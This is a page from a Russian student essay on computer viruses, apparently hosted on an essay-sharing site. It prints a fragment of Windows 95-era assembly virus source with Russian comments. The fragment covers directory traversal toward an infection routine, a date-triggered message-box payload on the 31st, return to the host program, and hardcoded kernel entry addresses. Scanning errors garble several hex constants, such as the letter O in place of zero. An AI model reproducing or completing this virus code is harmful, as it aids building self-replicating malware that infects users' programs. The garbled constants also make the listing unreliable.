Компьютерные вирусы
| Категория реферата: Рефераты по информатике, программированию
| Теги реферата: реферат на тему образ жизни, сочинение язык
| Добавил(а) на сайт: Jeshman.
Предыдущая страница реферата | 7 8 9 10 11 12 13 14 15 16 17 | Следующая страница реферата
;Получим текущую директорию lea edi,[ebp+offset tempdirl] push edi push 255 call GetCurDir
;Проверим, корневая ли это директория. Если да, то выходим mov ecx, 256/4 rep cmpsd jnz infectdir
;"3аметаем следы" и выходим в программу-носитель outty:
;Возвратимся в оригинальную текущую директорию lea eax,[ebp+offset orgdir] push eax call SetCurDir
;Получим текущую дату и время
lea eax, [ebp+offset systimestruct]
push eax call GetTime
;Проверим число. Если это 31-ое, выдаем сообщение cmp word ptr [ebp+offset day],31 jnz nopayload
;Сообщение для пользователя
push 1000h ;MB_SYSTEMMODAL lea eax, [ebp+offset boxtitle] push eax lea eax, [ebp+offset boxmsg] push eax push 0 call MsgBox
;Выход в программу-носитель nopayload: pop eax jmp eax
;Когда KERNEL будет обнаружен, его смещение будет записано kern dd OBFF93B95h
;Значения KERNEL, известные нам kern1 dd OBFF93B95h kern2 dd OBFF93C1Dh
;Чтение текущей директории
GetCurDir:
;3апишем в стек значение для получения текущей директории и вызовем KERNEL
push OBFF77744h jmp [ebp+offset kern]
;Установка текущей директории
SetCurDir:
;3апишем в стек значение для установки текущей директории и вызовем KERNEL
push OBFF7771Dh jmp [ebp+offset kern]
;Получение времени и даты
GetTime:
;Проверим, какой KERNEL работает cmp [ebp+offset kern],OBFF93B95h jnz gettimekern2
;3апишем в стек значение для получения
;времени и даты и вызовем KERNEL
push OBFF9DOB6h jmp [ebp+offset kern] gettimekern2:
;Запишем в стек значение для получения
;Времени и даты и вызовем KERNEL
push OBFF9Dl4Eh jmp [ebp+offset kern]
Рекомендуем скачать другие рефераты по теме: контрольная, использование рефератов.
Категории:
Предыдущая страница реферата | 7 8 9 10 11 12 13 14 15 16 17 | Следующая страница реферата